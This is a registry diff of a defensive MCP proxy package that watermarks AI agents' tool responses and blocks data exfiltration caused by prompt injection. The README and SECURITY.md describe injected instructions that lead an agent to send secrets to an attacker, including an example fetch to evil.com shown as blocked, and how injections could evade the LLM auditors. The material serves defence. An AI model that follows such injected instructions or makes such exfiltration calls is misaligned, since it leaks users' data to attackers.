@exfil/canary 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (69) hide show
  1. package/LICENSE +21 -0
  2. package/README.md +387 -0
  3. package/SECURITY.md +50 -0
  4. package/dist/entities.d.ts +43 -0
  5. package/dist/entities.d.ts.map +1 -0
  6. package/dist/entities.js +218 -0
  7. package/dist/entities.js.map +1 -0
  8. package/dist/index.d.ts +14 -0
  9. package/dist/index.d.ts.map +1 -0
  10. package/dist/index.js +183 -0
  11. package/dist/index.js.map +1 -0
  12. package/dist/logger.d.ts +29 -0
  13. package/dist/logger.d.ts.map +1 -0
  14. package/dist/logger.js +50 -0
  15. package/dist/logger.js.map +1 -0
  16. package/dist/persistence.d.ts +48 -0
  17. package/dist/persistence.d.ts.map +1 -0
  18. package/dist/persistence.js +296 -0
  19. package/dist/persistence.js.map +1 -0
  20. package/dist/proxy/DownstreamManager.d.ts +55 -0
  21. package/dist/proxy/DownstreamManager.d.ts.map +1 -0
  22. package/dist/proxy/DownstreamManager.js +110 -0
  23. package/dist/proxy/DownstreamManager.js.map +1 -0
  24. package/dist/proxy/ProxyServer.d.ts +60 -0
  25. package/dist/proxy/ProxyServer.d.ts.map +1 -0
  26. package/dist/proxy/ProxyServer.js +480 -0
  27. package/dist/proxy/ProxyServer.js.map +1 -0
  28. package/dist/proxy/auditor/DualAuditor.d.ts +27 -0
  29. package/dist/proxy/auditor/DualAuditor.d.ts.map +1 -0
  30. package/dist/proxy/auditor/DualAuditor.js +44 -0
  31. package/dist/proxy/auditor/DualAuditor.js.map +1 -0
  32. package/dist/proxy/auditor/LLMAuditor.d.ts +16 -0
  33. package/dist/proxy/auditor/LLMAuditor.d.ts.map +1 -0
  34. package/dist/proxy/auditor/LLMAuditor.js +221 -0
  35. package/dist/proxy/auditor/LLMAuditor.js.map +1 -0
  36. package/dist/proxy/auditor/types.d.ts +54 -0
  37. package/dist/proxy/auditor/types.d.ts.map +1 -0
  38. package/dist/proxy/auditor/types.js +11 -0
  39. package/dist/proxy/auditor/types.js.map +1 -0
  40. package/dist/proxy/types.d.ts +71 -0
  41. package/dist/proxy/types.d.ts.map +1 -0
  42. package/dist/proxy/types.js +8 -0
  43. package/dist/proxy/types.js.map +1 -0
  44. package/dist/scanner.d.ts +37 -0
  45. package/dist/scanner.d.ts.map +1 -0
  46. package/dist/scanner.js +57 -0
  47. package/dist/scanner.js.map +1 -0
  48. package/dist/server.d.ts +59 -0
  49. package/dist/server.d.ts.map +1 -0
  50. package/dist/server.js +711 -0
  51. package/dist/server.js.map +1 -0
  52. package/dist/simhash.d.ts +65 -0
  53. package/dist/simhash.d.ts.map +1 -0
  54. package/dist/simhash.js +151 -0
  55. package/dist/simhash.js.map +1 -0
  56. package/dist/state.d.ts +86 -0
  57. package/dist/state.d.ts.map +1 -0
  58. package/dist/state.js +136 -0
  59. package/dist/state.js.map +1 -0
  60. package/dist/token.d.ts +70 -0
  61. package/dist/token.d.ts.map +1 -0
  62. package/dist/token.js +146 -0
  63. package/dist/token.js.map +1 -0
  64. package/dist/types.d.ts +190 -0
  65. package/dist/types.d.ts.map +1 -0
  66. package/dist/types.js +12 -0
  67. package/dist/types.js.map +1 -0
  68. package/package.json +52 -0
  69. package/proxy.example.json +53 -0
package/LICENSE ADDED
@@ -0,0 +1,21 @@
1
+ MIT License
2
+
3
+ Copyright (c) 2026 exfil
4
+
5
+ Permission is hereby granted, free of charge, to any person obtaining a copy
6
+ of this software and associated documentation files (the "Software"), to deal
7
+ in the Software without restriction, including without limitation the rights
8
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9
+ copies of the Software, and to permit persons to whom the Software is
10
+ furnished to do so, subject to the following conditions:
11
+
12
+ The above copyright notice and this permission notice shall be included in all
13
+ copies or substantial portions of the Software.
14
+
15
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21
+ SOFTWARE.
package/README.md ADDED
@@ -0,0 +1,387 @@
1
+ # @exfil/canary
2
+
3
+ A transparent MCP proxy that watermarks every tool response and blocks data exfiltration caused by prompt injection.
4
+
5
+ Your AI agent reads a file. A malicious string inside that file tells it to forward the contents to an attacker. **@exfil/canary catches it and blocks the call.**
6
+
7
+ ---
8
+
9
+ ## How it works
10
+
11
+ @exfil/canary sits between your agent and all its MCP servers. Every tool response gets invisibly watermarked. Every outbound tool call is inspected across four independent detection layers:
12
+
13
+ 1. **Unicode marker** — exact sequence match. Catches direct forwarding.
14
+ 2. **Named entity** — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
15
+ 3. **SimHash** — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
16
+ 4. **Dual-LLM auditor** — two independent AI models from different providers both evaluate every outbound call. Both must agree CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.
17
+
18
+ Plus two enforcement layers:
19
+ - **Domain allowlist** — fail-closed. Any outbound URL not explicitly listed is blocked, regardless of whether a token was found.
20
+ - **Tool allowlist** — restrict which tools the agent is allowed to call at all.
21
+
22
+ ---
23
+
24
+ ## Modes
25
+
26
+ | Mode | How it works |
27
+ |---|---|
28
+ | **Proxy** _(recommended)_ | @exfil/canary wraps all your other MCP servers. The agent connects only to @exfil/canary. Every response is automatically watermarked; every outbound call is automatically scanned. No system prompt required. |
29
+ | **Standalone** | @exfil/canary is one server among many. The agent must be instructed via system prompt to call `wrap_content` and `scan_outbound` explicitly. |
30
+
31
+ ---
32
+
33
+ ## Install
34
+
35
+ ```bash
36
+ npm install -g @exfil/canary
37
+ ```
38
+
39
+ Or run without installing:
40
+
41
+ ```bash
42
+ npx @exfil/canary
43
+ ```
44
+
45
+ Requires Node.js 18+.
46
+
47
+ ---
48
+
49
+ ## Proxy Mode — Setup
50
+
51
+ ### 1. Create `proxy.json`
52
+
53
+ Start from the example:
54
+
55
+ ```bash
56
+ cp node_modules/@exfil/canary/proxy.example.json proxy.json
57
+ ```
58
+
59
+ Or write it from scratch. List every downstream MCP server you want to protect:
60
+
61
+ ```json
62
+ {
63
+ "servers": [
64
+ {
65
+ "id": "filesystem",
66
+ "command": "npx",
67
+ "args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/working/dir"]
68
+ },
69
+ {
70
+ "id": "web",
71
+ "command": "npx",
72
+ "args": ["-y", "@modelcontextprotocol/server-fetch"]
73
+ }
74
+ ],
75
+ "allowed_domains": [
76
+ "api.github.com",
77
+ "registry.npmjs.org"
78
+ ]
79
+ }
80
+ ```
81
+
82
+ **`allowed_domains` is fail-closed.** If the field is absent or empty, all outbound URLs are blocked. List every domain your agent legitimately calls.
83
+
84
+ Each server entry:
85
+ | Field | Required | Description |
86
+ |---|---|---|
87
+ | `id` | Yes | Short name used as tool namespace prefix (e.g. `filesystem__read_file`). Must be lowercase, start with a letter. |
88
+ | `command` | Yes | Executable to spawn. |
89
+ | `args` | No | CLI arguments. |
90
+ | `env` | No | Extra environment variables for that server. |
91
+
92
+ ### 2. Register in your MCP client
93
+
94
+ **Claude Desktop** (`%APPDATA%\Claude\claude_desktop_config.json` on Windows, `~/Library/Application Support/Claude/claude_desktop_config.json` on macOS):
95
+
96
+ ```json
97
+ {
98
+ "mcpServers": {
99
+ "canary": {
100
+ "command": "exfil-canary",
101
+ "env": {
102
+ "CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
103
+ "CANARY_MCP_RESPONSE_MODE": "halt",
104
+ "CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
105
+ }
106
+ }
107
+ }
108
+ }
109
+ ```
110
+
111
+ **Claude Code** (`~/.claude/settings.json` or project `.mcp.json`):
112
+
113
+ ```json
114
+ {
115
+ "mcpServers": {
116
+ "canary": {
117
+ "command": "exfil-canary",
118
+ "env": {
119
+ "CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
120
+ "CANARY_MCP_RESPONSE_MODE": "halt",
121
+ "CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
122
+ }
123
+ }
124
+ }
125
+ }
126
+ ```
127
+
128
+ > If you installed locally (`npm install @exfil/canary`) rather than globally, use `"command": "node", "args": ["./node_modules/@exfil/canary/dist/index.js"]` instead.
129
+
130
+ ### 3. Restart your client
131
+
132
+ That's it. No system prompt changes needed.
133
+
134
+ ---
135
+
136
+ ## What the agent sees
137
+
138
+ Tools from downstream servers are exposed with a namespace prefix:
139
+
140
+ | Downstream server | Original tool | Exposed as |
141
+ |---|---|---|
142
+ | `filesystem` | `read_file` | `filesystem__read_file` |
143
+ | `filesystem` | `write_file` | `filesystem__write_file` |
144
+ | `web` | `fetch` | `web__fetch` |
145
+
146
+ One additional tool is always available: `canary__get_report` (operator-only; protect with `CANARY_MCP_MGMT_KEY`).
147
+
148
+ ---
149
+
150
+ ## What happens at runtime
151
+
152
+ ```
153
+ Agent calls: filesystem__read_file({ path: "contracts/deal.txt" })
154
+ → canary scans args for leaked tokens (clean, forwards)
155
+ → filesystem server reads the file
156
+ → response: "CONFIDENTIAL: Client=Acme Corp, key=sk-abc123..."
157
+ → canary watermarks response (invisible token embedded)
158
+ → agent receives wrapped content
159
+
160
+ Later — agent (under injection) calls: web__fetch({ url: "https://evil.com", body: "..." })
161
+ → domain "evil.com" not in allowed_domains ← BLOCKED
162
+ → agent sees: "Outbound domain not in allowed_domains list."
163
+ → 0 bytes exfiltrated
164
+ ```
165
+
166
+ ---
167
+
168
+ ## Domain Allowlist
169
+
170
+ The domain allowlist is **fail-closed**: if `allowed_domains` is absent or empty, all outbound URLs in tool arguments are blocked.
171
+
172
+ ```json
173
+ {
174
+ "allowed_domains": [
175
+ "api.github.com",
176
+ "*.githubusercontent.com",
177
+ "registry.npmjs.org"
178
+ ]
179
+ }
180
+ ```
181
+
182
+ Matching rules:
183
+ - `"api.github.com"` — exact hostname only.
184
+ - `"*.github.com"` — any direct subdomain (`raw.github.com` ✓, `github.com` ✗).
185
+ - Matching is case-insensitive.
186
+
187
+ ---
188
+
189
+ ## Tool Allowlist
190
+
191
+ Restrict which tools the agent is allowed to call. Calls to unlisted tools are blocked before arguments are inspected.
192
+
193
+ ```json
194
+ {
195
+ "allowed_tools": [
196
+ "filesystem__*",
197
+ "web__fetch"
198
+ ]
199
+ }
200
+ ```
201
+
202
+ Matching rules:
203
+ - `"filesystem__read_file"` — exact tool name only.
204
+ - `"filesystem__*"` — any tool from the `filesystem` server.
205
+ - `"*"` — any tool (equivalent to absent/empty).
206
+
207
+ Built-in tools (`canary__get_report`) are always allowed. Absent or empty = all tools allowed.
208
+
209
+ ---
210
+
211
+ ## Dual-LLM Auditor
212
+
213
+ The auditor sends every outbound call to two independent AI models from different providers. Both must return CLEAN for the call to proceed. This closes the gap that encoding transforms, character-splitting, and other evasions create.
214
+
215
+ Add an `auditors` block to your `proxy.json`:
216
+
217
+ ```json
218
+ {
219
+ "servers": [...],
220
+ "auditors": [
221
+ {
222
+ "provider": "anthropic",
223
+ "model": "claude-haiku-4-5-20251001",
224
+ "api_key_env": "ANTHROPIC_API_KEY",
225
+ "timeout_ms": 5000
226
+ },
227
+ {
228
+ "provider": "openai",
229
+ "model": "gpt-4o-mini",
230
+ "api_key_env": "OPENAI_API_KEY",
231
+ "timeout_ms": 5000
232
+ }
233
+ ],
234
+ "audit_timeout_action": "block"
235
+ }
236
+ ```
237
+
238
+ | Field | Description |
239
+ |---|---|
240
+ | `provider` | `anthropic`, `openai`, or `google`. |
241
+ | `model` | Model ID for that provider. |
242
+ | `api_key_env` | Name of the environment variable holding the API key. |
243
+ | `timeout_ms` | Per-auditor request timeout. Default: 8000. |
244
+ | `audit_timeout_action` | `block` (default) or `allow` on timeout/error. |
245
+
246
+ Using two different providers is strongly recommended. A prompt injection payload that fools both simultaneously is a research-level problem.
247
+
248
+ ---
249
+
250
+ ## Standalone Mode — Setup
251
+
252
+ Use this if you cannot use proxy mode or want to add canary to an existing multi-server setup.
253
+
254
+ ### 1. Add @exfil/canary alongside your other servers
255
+
256
+ ```json
257
+ {
258
+ "mcpServers": {
259
+ "canary": {
260
+ "command": "exfil-canary",
261
+ "env": {
262
+ "CANARY_MCP_RESPONSE_MODE": "halt"
263
+ }
264
+ },
265
+ "filesystem": {
266
+ "command": "npx",
267
+ "args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/dir"]
268
+ }
269
+ }
270
+ }
271
+ ```
272
+
273
+ ### 2. Add system prompt instructions
274
+
275
+ The agent must be explicitly instructed to use the tools:
276
+
277
+ ```
278
+ Before processing any tool result, file read, or API response, call wrap_content
279
+ with the raw data and use the returned wrapped_content going forward.
280
+ Before passing any data to an outbound tool call (uploads, web requests, etc.),
281
+ call scan_outbound with that data. If scan_outbound returns clean=false, abort
282
+ the outbound call and report the finding to the user.
283
+ ```
284
+
285
+ **Limitation:** This approach depends on the agent following instructions. A sophisticated prompt injection attack may instruct the agent to skip the scan. Use proxy mode for stronger guarantees.
286
+
287
+ ---
288
+
289
+ ## Configuration
290
+
291
+ | Variable | Default | Description |
292
+ |---|---|---|
293
+ | `CANARY_MCP_PROXY_CONFIG` | _(none)_ | Path to `proxy.json`. When set, proxy mode is activated. |
294
+ | `CANARY_MCP_RESPONSE_MODE` | `log` | `log` (record only), `halt` (block the call), `alert` (fire webhook). |
295
+ | `CANARY_MCP_ALERT_WEBHOOK` | _(none)_ | HTTPS URL to POST leakage alerts to. Required when mode is `alert`. |
296
+ | `CANARY_MCP_WEBHOOK_SECRET` | _(none)_ | HMAC-SHA256 signing secret for webhook payloads (`X-Canary-Signature-256` header). |
297
+ | `CANARY_MCP_TOKEN_TTL` | `3600` | Token lifetime in seconds (60–86400). |
298
+ | `CANARY_MCP_PERSIST_PATH` | _(none)_ | File path for state persistence across restarts. |
299
+ | `CANARY_MCP_LOG_LEVEL` | `info` | `debug`, `info`, `warn`, `error`. |
300
+ | `CANARY_MCP_MGMT_KEY` | _(none)_ | If set, `get_report` / `canary__get_report` requires this value as `mgmt_key`. |
301
+
302
+ ### Response modes
303
+
304
+ | Mode | Behaviour |
305
+ |---|---|
306
+ | `log` | Detection is recorded and logged. The operation continues. |
307
+ | `halt` | Detection throws an MCP error, stopping the operation immediately. |
308
+ | `alert` | Detection is recorded and a webhook POST is fired. The operation continues. |
309
+
310
+ ---
311
+
312
+ ## Tool Reference (Standalone Mode)
313
+
314
+ In proxy mode these tools are called internally. In standalone mode the agent calls them explicitly.
315
+
316
+ ### `wrap_content`
317
+
318
+ Embeds an invisible marker into content and returns it with a tracking ID.
319
+
320
+ | Field | Type | Required | Description |
321
+ |---|---|---|---|
322
+ | `content` | string | Yes | Raw content to mark (max 10 MiB). |
323
+ | `source_type` | enum | Yes | `tool_result`, `file_read`, `api_response`, `database_row`, `user_message`, `other`. |
324
+ | `source_server` | string | No | Originating MCP server. |
325
+ | `source_tool` | string | No | Originating tool name. |
326
+ | `embed_position` | enum | No | `prefix`, `suffix` (default), `both`, `random_word_boundary`. |
327
+
328
+ ```json
329
+ { "token_id": "a3f1...", "wrapped_content": "<content with invisible marker>" }
330
+ ```
331
+
332
+ ### `check_leakage`
333
+
334
+ Checks whether a specific token appears in a given string.
335
+
336
+ | Field | Type | Required | Description |
337
+ |---|---|---|---|
338
+ | `token_id` | string | Yes | 32-char hex ID from `wrap_content`. |
339
+ | `output` | string | Yes | Text to inspect (max 10 MiB). |
340
+ | `target_server` | string | No | MCP server receiving the data. |
341
+ | `target_tool` | string | No | Tool receiving the data. |
342
+
343
+ ```json
344
+ { "token_id": "a3f1...", "status": "active", "leaked": true, "action_taken": "halted" }
345
+ ```
346
+
347
+ ### `scan_outbound`
348
+
349
+ Scans data for any active token before it leaves the agent.
350
+
351
+ | Field | Type | Required | Description |
352
+ |---|---|---|---|
353
+ | `data` | string | Yes | Data about to be sent outbound (max 50 MiB). |
354
+ | `target_server` | string | No | Destination MCP server. |
355
+ | `target_tool` | string | No | Destination tool. |
356
+
357
+ ```json
358
+ { "clean": true, "tokens_scanned": 12, "scan_duration_ms": 3, "leakage_count": 0 }
359
+ ```
360
+
361
+ ### `canary__get_report`
362
+
363
+ Returns the full session: all token metadata and leakage events. Operator-only — protect with `CANARY_MCP_MGMT_KEY`.
364
+
365
+ ---
366
+
367
+ ## Persistence
368
+
369
+ When `CANARY_MCP_PERSIST_PATH` is set, state is written atomically after every mutation (file mode `0o600`).
370
+
371
+ **Limitation:** Unicode sequences are never persisted. After a restart, existing tokens cannot re-detect their sequences in new data. Leakage history is retained.
372
+
373
+ ---
374
+
375
+ ## Building from Source
376
+
377
+ ```bash
378
+ git clone https://github.com/exfil-hq/canary.git
379
+ cd canary
380
+ npm install
381
+ npm run build # outputs to dist/
382
+ npm test
383
+ ```
384
+
385
+ ---
386
+
387
+ See [SECURITY.md](./SECURITY.md) for the full threat model and known limitations.
package/SECURITY.md ADDED
@@ -0,0 +1,50 @@
1
+ # Security — Threat Model and Known Limitations
2
+
3
+ ## What @exfil/canary protects against
4
+
5
+ @exfil/canary detects and blocks data exfiltration caused by prompt injection attacks against MCP-connected AI agents. It operates as a transparent proxy: the agent connects only to @exfil/canary, which intercepts every tool call in both directions.
6
+
7
+ ### Threat model
8
+
9
+ An attacker embeds malicious instructions inside content that the agent reads (a file, a web page, an API response, a database row). Those instructions direct the agent to forward sensitive data to an attacker-controlled destination.
10
+
11
+ @exfil/canary defends against this in two complementary ways:
12
+
13
+ **Detection** — every tool response is watermarked. If the agent later tries to forward that content, the watermark is found in the outbound call and the operation is blocked (in `halt` mode) or recorded.
14
+
15
+ Four independent detection layers are applied to every outbound call:
16
+
17
+ 1. **Unicode marker** — exact invisible sequence match. Catches direct forwarding.
18
+ 2. **Named entity** — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
19
+ 3. **SimHash** — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
20
+ 4. **Dual-LLM auditor** — two independent AI models from different providers both evaluate the outbound call in context. Both must return CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.
21
+
22
+ **Containment** — even if the agent is not detected exfiltrating watermarked content, the domain allowlist prevents calls to destinations that were never authorised. An injection payload cannot exfiltrate to an unknown domain regardless of how the content is encoded.
23
+
24
+ ---
25
+
26
+ ## Known limitations
27
+
28
+ ### Sequence persistence
29
+
30
+ Unicode marker sequences are never written to disk. After a process restart, tokens loaded from a persistence file have their sequences cleared. The entity, SimHash, and auditor layers still operate on these tokens; only the exact-sequence check is unavailable until new content is read post-restart.
31
+
32
+ ### Standalone mode
33
+
34
+ In standalone mode the agent must be instructed via system prompt to call `wrap_content` and `scan_outbound` explicitly. A sophisticated prompt injection payload may instruct the agent to skip these calls. Proxy mode does not have this limitation — interception is structural and cannot be bypassed by instructions to the agent.
35
+
36
+ ### Auditor layer
37
+
38
+ The dual-LLM auditor adds a probabilistic layer. It is not guaranteed to detect all forms of derived content. Using two providers from different organisations significantly raises the bar, but a sufficiently crafted payload could theoretically fool both models simultaneously.
39
+
40
+ When `audit_timeout_action` is set to `allow`, a network failure or provider outage causes the auditor layer to be skipped silently. Set it to `block` (the default) in high-sensitivity environments.
41
+
42
+ ### Domain allowlist scope
43
+
44
+ The domain allowlist inspects URL hostnames found in serialised tool call arguments. It does not inspect binary content, image data, or other non-text payloads. It also does not prevent a compromised downstream server from making outbound calls on its own — it only controls what the agent sends through the proxy.
45
+
46
+ ---
47
+
48
+ ## Responsible disclosure
49
+
50
+ To report a security vulnerability, open a private advisory on the [GitHub repository](https://github.com/exfil-hq/canary) or email the maintainers directly via the contact listed in the repository profile.
@@ -0,0 +1,43 @@
1
+ /**
2
+ * v1.1 — Named entity extraction for structural canary injection.
3
+ *
4
+ * Extracts identifiable values from content at wrap time and stores them as
5
+ * EntityCanary records alongside the Unicode sequence marker. When scanning
6
+ * outbound data, exfil/canary checks for the presence of these extracted values
7
+ * in addition to the Unicode marker — catching exfiltration that involves
8
+ * paraphrasing or rewriting, as long as the underlying identifier (e.g. an
9
+ * API key, email address, or UUID) is reproduced verbatim.
10
+ *
11
+ * SECURITY: Extracted values are treated with the same sensitivity as the
12
+ * Unicode sequence — they are never returned in tool outputs, never logged,
13
+ * and never persisted in plaintext.
14
+ *
15
+ * Detection coverage added by v1.1 vs v1.0:
16
+ * - Agent reads "API key: sk-abc123" and writes "key=sk-abc123" → DETECTED
17
+ * - Agent reads email content and includes recipient addr in forward → DETECTED
18
+ * - Raw copy-paste / direct forwarding → DETECTED (v1.0)
19
+ * - Agent summarises with different phrasing, no literal value → NOT detected (v2.0)
20
+ */
21
+ import type { EntityCanary } from './types.js';
22
+ /**
23
+ * Extracts named entities from `content` for use as structural canary markers.
24
+ *
25
+ * Each unique entity value is returned at most once, even if it appears
26
+ * multiple times in the content. Values are de-duplicated case-sensitively
27
+ * for exact matching.
28
+ *
29
+ * @param content The raw content to analyse (before embedding the Unicode token).
30
+ * @returns Array of EntityCanary records. May be empty if no entities found.
31
+ */
32
+ export declare function extractEntities(content: string): EntityCanary[];
33
+ /**
34
+ * Checks whether any of the provided entity values appear in `data`.
35
+ * Returns the matching entity canaries (values excluded from returned objects
36
+ * — callers receive entity_type + context_hint only when building reports).
37
+ *
38
+ * @param data The outbound string to scan.
39
+ * @param canaries Entity canaries to check for.
40
+ * @returns Array of matched canaries (values intact for internal use only).
41
+ */
42
+ export declare function scanForEntityValues(data: string, canaries: EntityCanary[]): EntityCanary[];
43
+ //# sourceMappingURL=entities.d.ts.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"entities.d.ts","sourceRoot":"","sources":["../src/entities.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;GAmBG;AAEH,OAAO,KAAK,EAAE,YAAY,EAAc,MAAM,YAAY,CAAC;AA6K3D;;;;;;;;;GASG;AACH,wBAAgB,eAAe,CAAC,OAAO,EAAE,MAAM,GAAG,YAAY,EAAE,CAwC/D;AAED;;;;;;;;GAQG;AACH,wBAAgB,mBAAmB,CACjC,IAAI,EAAE,MAAM,EACZ,QAAQ,EAAE,YAAY,EAAE,GACvB,YAAY,EAAE,CAUhB"}